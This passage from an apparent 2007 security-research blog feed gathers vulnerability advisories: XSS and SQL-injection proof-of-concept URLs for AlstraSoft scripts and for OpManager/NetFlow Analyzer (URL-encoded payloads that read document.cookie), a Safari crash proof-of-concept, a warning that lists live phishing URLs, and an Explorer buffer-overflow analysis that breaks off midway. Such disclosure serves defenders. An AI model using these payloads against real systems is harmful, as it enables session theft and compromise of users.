/>programedit&mode=edit&id=42&msg=Program%20Edited%20Success<br />fully"><script>alert()</script><br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />uploadProducts&pgmid=41%20or%201=1 // SQL And XSS<br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />daily&d=9&m=07&y=2007 // all variables XSS affected except Act<br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date<br />"><script>alert()</script><br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007<br />&programs=All // all variables XSS affceted except Act y sub<br /><br />http://[Victim]/affiliate/merchants/temp.php?rowid=<br />5"><script>alert()</script> // posible SQL too<br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script><br />&modofpay=Authorize.net&bankname=&bankno=&<br />bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=<br /><br />####################################<br />AlstraSoft Article Manager Pro<br />####################################<br /><br />http://[Victim]/article/contact_author.php?<br />userid=1%20"><script>alert()</script><br /><br />#######################################<br />AlstraSoft AskMe Pro<br />#######################################<br /><br />http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL<br /><br />http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL<br /><br />http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script><br />http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL<br />http://[Victim]/ask/register.php?typ=expert"><script>alert()</script><br /><br />###################### €nd ########################<br /><br />Thnx to estrella to be my ligth.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-33412748404277402032007-07-13T11:20:00.000-07:002007-07-13T12:41:20.374-07:00Crashing Safari 3.0.2 for windows Step by StepSafari for windows 3.0.2 Crash Step by step<br /><br />http://www.apple.com/safari/download/<br /><br /><br />The Bug come from activity window wen manage<br />diferents tab accross the activity window.<br />I report it to vendor and they working for <br />debugging this flaw and others (i think).<br /><br />Version afected:<br /><br />Safari for windows 3.0.2 (512.13.1)<br />i don´t know if this issue colud be done <br />in other versions.<br /><br />And i don´t know if with this issue a local or<br />remote user can execute code.<br /><br />Let´s Go<br /><br />1 - open a safari window.<br />2 - open a new tab in the same window (now we are in the second tab)<br />3 - open Window/activity (we have the two tabs)<br />4 - click on the first tab in the activity window (safari crashing)<br /><br />other way :<br /><br />1 open a safari window ( window 1 )<br />2 open a new tab in window 1 <br />3 open a new safari window (window 2)<br />4 open a new tab in window 2 (now we are in the window 2 tab 2)<br />5 open window/activity (we have the four tabs )<br />6 doble click in any tab of the window 1 (safari crashing)<br /><br />I working in a html file to demostrate that this posible vuln can exploit <br />by a remote user. Any sugention or idea are welcome to Lostmon@gmail.com<br />Thnx to all !!<br /><br />Whatch this 'mov' to look the step by step with the video:<br /><br /><object width="400" height="250"><param name="movie" value="http://www.spymac.com/hop?id=2150262"></param><param name="wmode" value="transparent"></param><embed src="http://www.spymac.com/hop?id=2150262" type="application/x-shockwave-flash" wmode="transparent" width="400" height="250"></embed></object><br /><br /><br />Thnx to estrella to be my ligth.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-59586607572690051652007-07-04T11:12:00.000-07:002007-07-05T11:39:05.557-07:00NetFlow Analizer 5 & OpManager 7 multiple XSS###################################################<br />NetFlow Analizer 5 & OpManager 7 multiple XSS<br />vendor url:http://www.adventnet.com/<br />advisore:http://lostmon.blogspot.com/2007/07/<br />netflow-analizer-5-opmanager-7-multiple.html<br />vendor notify:yes exploits include:yes<br />Secunia:<a href="http://secunia.com/advisories/25947/" taget="_BLANK">SA25947</a> <a href="http://secunia.com/advisories/20067/" target="_BLANK">SA20067</a>, <br />BID:<a href="http://www.securityfocus.com/bid/24767" target="_BLANK">24767,</a> <a href="http://www.securityfocus.com/bid/24766 target="_BLANK>24766</a><br />SecWatch:<a href="http://secwatch.org/advisories/1018376/" target="_BLANK">SWID1018376</a>, <a href="http://secwatch.org/advisories/1018377/" target="_BLANK">SWID1018377</a><br />###################################################<br /><br />NetFlow Analizer and OpManager contains a flaw that allows<br />a remote cross site scripting attack. This flaw exists<br />because the application does not validate multiple params<br />upon submission to multiple scripts.This could allow a user<br />to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br /><br />#####################<br />Versions afected:<br />#####################<br /><br />OpManager 7<br />OpManager 6<br /><br />NetFlow Analizer 5<br /><br />other versions can be vulnerables too<br /><br />###################<br />Solution:<br />###################<br /><br />No solutions was available at this time !!!<br /><br />##################<br />Time Line<br />##################<br /><br />Discovered:20-05-2007<br />vendor notify:02-07-2007<br />vendor response:-----<br />disclosure:04-07-2007<br /><br />###################<br />Examples<br />###################<br /><br />for exploit some flaws you need to login.<br /><br />#####################<br />OpManager<br />#####################<br /><br /><span style="font-size:78%;">http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C<br />%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3<br />D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%<br />67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57<br />%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7<br />2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%<br />73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E<br />%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2<br />F%62%6F%64%79%3E</span><br /><br /><span style="font-size:78%;">http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22<br />%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6<br />5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%<br />6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E<br />%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2<br />F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%<br />3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D<br />%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3<br />E%3C%2F%62%6F%64%79%3E<br /></span><br /><span style="font-size:78%;">http://localhost:8080/devices/Search.do?searchTerm=sss%22%<br />3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6<br />5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62<br />%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%<br />6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3<br />C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F<br />%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%<br />75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7<br />0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected<br />Tab=Map</span><br /><br /><span style="font-size:78%;">http://localhost:8080/reports/ReportViewAction.do?selected<br />Tab=Reports&selectedNode=Server_Memory_Utilization&reportN<br />ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E<br />%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%<br />6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6<br />D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20<br />%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%<br />57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6<br />1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69<br />%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di<br />splayName=webclient.reports.servers.memutil</span><br /><br /><span style="font-size:78%;">http://localhost:8080/reports/ReportViewAction.do?selectedT<br />ab=Reports&selectedNode=Server_Memory_Utilization&reportNam<br />e=Utilization_Report&displayName=webclient.reports.servers.<br />memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%<br />20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F<br />%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7<br />4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%<br />31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21<br />%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6<br />F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%<br />69%70%74%3E%3C%2F%62%6F%64%79%3E<br /></span><br /><span style="font-size:78%;">http://localhost:8080/reports/ReportViewAction.do?selectedT<br />ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%<br />6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22<br />%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7<br />3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%<br />73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E<br />%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6<br />3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%<br />2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62<br />%6F%64%79%3E&reportName=Utilization_Report&displayName=webc<br />lient.reports.servers.cpuutil<br /><br /><br />http://localhost:8080/admin/ServiceConfiguration.do?operati<br />on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7<br />0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%<br />73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E<br />%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2<br />1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%<br />21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72<br />%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2<br />F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte<br />r&serviceName=Alerter<br /><br />http://localhost:8080/admin/DeviceAssociation.do?selectedNo<br />de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6<br />8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%<br />2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D<br />%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3<br />E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%<br />2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63<br />%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7<br />0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa<br />me=com.adventnet.me.opmanager.webclient.admin.association.N<br />TServiceAssociation<br /><br /><br />http://localhost:8080/admin/DeviceAssociation.do?selectedTa<br />b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%<br />20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F<br />%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7<br />4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%<br />31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21<br />%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6<br />F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%<br />69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf<br />igurations<br /><br />http://localhost:8080/admin/DeviceAssociation.do?selectedTa<br />b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F<br />%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6<br />8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%<br />70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73<br />%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5<br />8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%<br />72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E<br />%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6<br />F%64%79%3E<br /></span><br /><br />#######################<br />NetFlow Analizer<br />#######################<br /><br /><span style="font-size:78%;">http://localhost:8080/netflow/jspui/applicationList.jsp?alph<br />a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68<br />%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E<br />%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F<br />%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C<br />%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70<br />%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D<br />%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E<br />%3C%2F%62%6F%64%79%3E<br /><br />http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif<br />y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7<br />2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6<br />2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6<br />E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2<br />F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3<br />E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6<br />5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3<br />C%2F%62%6F%64%79%3E&appID=62<br /><br />http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=<br />ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%<br />20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%<br />6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%<br />6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%<br />3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%<br />2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%<br />75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%<br />74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos<br /><br />http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g<br />roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%<br />68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%<br />2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%<br />6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%<br />3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%<br />70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%<br />6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%<br />3E%3C%2F%62%6F%64%79%3E&grDisp=1<br /><br />http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g<br />lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6<br />8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E<br />%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%<br />6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2<br />F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E<br />%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%<br />6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2<br />F%62%6F%64%79%3E<br /><br />http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl<br />obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%<br />72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62<br />%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2<br />0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%<br />72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73<br />%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2<br />E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%<br />64%79%3E&period=hourly&customOption=true&firstTime=true<br /></span><br />#################### €nd ################################<br /><br />Thnx to estrella to be my ligth.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-85638043310934147332007-06-17T05:48:00.000-07:002007-06-17T07:52:14.851-07:00Skype Phishing and other pay methoth Scam################################################<br />Skype Phishing and other pay methoth Scam <br />###############################################<br /><br />Hoy me llego un correo solicitandome que actualizara<br />La informacion de mi cuenta de skype (sistema que no uso)<br /><br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/correo.jpg" height="250" width="400"><br />Es una nueva forma de hacerse con las contraseñas de los<br />incautos usuarios;pero esto va un poco mas lejos.<br /><br />Si por desgracia accedemos a la web malefica:<br /><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/<br />skype.com/5746464646/login.html<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/web_original.jpg" height="250" width="400"><br />ademas de perder nuestra cuenta de skype tenemos mucho<br />mas que perder.pues la pagina malefica, ademas intentara<br />por medio de engaño hacerse con varias de nuestras<br />contraseñas o datos importantes de nuestras formas<br />de pago por internet.<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/formas_pago.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/<br />skype.com/5746464646/c2.php<br /><br />Nuestra cuenta de PayPal :<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/paypal_phishing.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/<br />skype.com/5746464646/PayPal%20-%20Log%20In.htm<br /><br /><br />nuestra cuenta de MoneyBrookers<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/moneybroker_phishing.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/<br />skype.com/5746464646/book1.htm<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/moneybroker_phishing2.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/<br />skype.com/5746464646/bookf.htm<br /><br />asi como los posibles datos de nuestra targeta visa y/o mastercard.<br /><br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/skype_phishing.jpg" height="250" width="400"><br />aseguraos de que las direcciones que visitais son las autenticas<br />de los sitios de pago, si no,no introducir ningun dato en ellas y<br />aun siendo lejitimas , deberiais desconfiar igualmente.<br /><br />################## €nd ###################################<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-23912686167395433222007-06-16T08:45:00.000-07:002007-06-27T10:42:03.129-07:00Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS############################################<br />Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS<br />Vendor Url:www.apple.com/safari/<br />Advisore:http://lostmon.blogspot.com/2007/06/<br />safari-301-552122-for-windows.html<br />Vendor notify:yes exploit available:yes<br />BID:http:<a href"http://www.securityfocus.com/bid/24497" target="_BLANK">24497</a><br />###########################################<br /><br />Safari contains a flaw that may allow a remote denial of service.<br />The issue is triggered when specially crafted input is processed <br />by the web browser. The crashes occur due to issues with the<br />functions to manage the History and all History,and will result<br />in loss of availability for the application.I don´t know if this<br />can execute arbitrary code.<br /><br /><br /><br />#############<br />versions:<br />#############<br /><br />Safari 3.0.1<br /><br />###########<br />solution:<br />###########<br /><br />Update to version 3.0.2<br /><br />##########<br />timeline:<br />##########<br /><br /> discovered:14-06.2007<br /> vendor notify:15-06-2007<br /> vendor response:<br /> disclosure:16-06-2007<br /><br />#####################<br />details of the crash<br />#####################<br /><br />see the screen shoot:<br /><br />http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif<br /><br />--<br /><br />Crash !<br /><br />AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll<br />ModVer: 1.434.6.0 Offset: 000097cd<br /><br />#################<br />Safari Crash Poc<br />#################<br />save this file as html document and open it in safari<br />put some number in the second form and safai crash.<br /><br /><html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title><br /><body><br /><p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p><br /><p> Put some number in the second form for crash Safari</p><br /><form id="historyForm1" method="GET" action="#"><br /><input type="text" id="currentIndex1" name="currentIndex" value="sss"><br /><textarea id="historyLocation1" name="historyLocation"></textarea><br /><form id="historyForm2" method="GET" action="#"><br /><input type="text" id="currentIndex2" name="currentIndex"><br /><textarea id="historyLocation2" name="historyLocation"></textarea><br /></form></form></body></html><br /><br />#################### €nd #####################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all Lostmon´s Groups<br />Thnx to all Who belive in me !!<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-82508404451207588812007-06-04T11:37:00.003-07:002010-04-18T08:16:53.629-07:00Buffer overflow in extended file atributes in Explorer.exe#######################################################<br />
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)<br />
Buffer overflow in extended file atributes.<br />
Vendor url: http://www.microsoft.com/<br />
Advisore:http://lostmon.blogspot.com/2007/06/<br />
buffer-overflow-in-extended-file.html<br />
Vendor notify:yes Vendor confirmed:yes Exploit include:NO<br />
#######################################################<br />
<br />
################<br />
SUMARY:<br />
################<br />
<br />
1- History (how and why)<br />
2-explanation of buffer overflow<br />
3-versions tested<br />
4-solution<br />
5-timeline<br />
6-response from vendor<br />
7-Test<br />
8-related vulns and documentations<br />
<br />
<br />
<br />
####################<br />
1-History:<br />
####################<br />
<br />
<br />
If we look this m$ advisory the information in section :<br />
<br />
http://www.microsoft.com/technet/security/advisory/933052.mspx<br />
<br />
--<br />
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:<br />
<br />
The vulnerability cannot be exploited automatically through e-mail.<br />
For an attack to be successful, a user must open an attachment that<br />
is sent in an e-mail message.<br />
--<br />
<br />
this is not all true :)<br />
<br />
If the user download the file and put in a folder , wen open the<br />
folder explorer crash...<br />
<br />
If you open any program, what use windows API and ole32.dll for<br />
open files,and you go to file/open and go to the folder with the<br />
malformed doc file, explorer call ole32.dll and the program is<br />
crashed and loosing all information not save.<br />
<br />
Examples of this case :<br />
<br />
notepad++ => http://notepad-plus.sourceforge.net/es/site.htm<br />
(vendor notify on 27-05-2007 via Email (no response)<br />
<br />
Multiple Macromedia family programs => http://www.macromedia.com<br />
(Adobe vendor informed on 27-05-2007 via webform and Confirmed.<br />
http://www.adobe.com/misc/securityform.html)<br />
<br />
multiple others programs are afected.<br />
<br />
Affter a simple study on the malformed word document exploit /vulns<br />
i have a little observation and i think that this vuln could be done<br />
in some other programs,not only in a word appz.<br />
<br />
Affter monitoring explorer and some dlls i think what this is only<br />
the first point of the iceberg.The overflow is done wen explorer<br />
call the kernel module KERNEL32, wen make some system calls to <br />
manage the information of any file whith ntdll.dll<br />
<br />
In the function GetFileAttributesExW and GetFileAttributesW<br />
(KERNEL32) and in the undocumented functions NtQueryInformationFile,<br />
NtQueryDirectoryFile and NtSetInformationFile functions on ntdll.dll <br />
<br />
Those functions obtain the extended file atributes if the information<br />
is to long in subfunctions FileAllInformation() in FileNameInformation()<br />
and other (look in file_information_class) we obtain a buffer overflow,<br />
some others subfunctions can get the same error.<br />
<br />
Windows show the extended file attributes in multiple parts of the system,<br />
wen look a foñder, wen put the mouse over a file or a folder.<br />
<br />
Other applications use the same files for do the same :)<br />
<br />
#######################<br />
2-Explanation<br />
#######################<br />
<br />
<p>Extended file attributes is a file system feature that enables users to<br />
associate computer files with metadata not interpreted by the filesystem,<br />
whereas regular attributes have a purpose strictly defined by the filesystem<br />
(such as permissions or records of creation and modification times). Unlike<br />
forks, which can usually be as large as the maximum file size, extended<br />
attributes are usually limited in size to a value significantly smaller than<br />
the maximum file size. Typical uses can be storing the author of a document,<br />
the character encoding of a plain-text document,or a checksum.</p><br />
<br />
<br />
A local buffer overflow exists in the windows explorer . <br />
The extended file atributes functions have a small size of the buffer in 'FileAllInformation(),FileNameInformation' and other subfunctions in <br />
Undocumented functions of NTDLL , resulting in a buffer overflow. With<br />
a unknow impact.<br />
<br />
<br />
<br />
This is the size of buffer in this related functions<br />
and the main function involved<br />
<br />
FileAllInformation<br />
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile <br />
<br />
FileNameInformation<br />
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile <br />
<br />
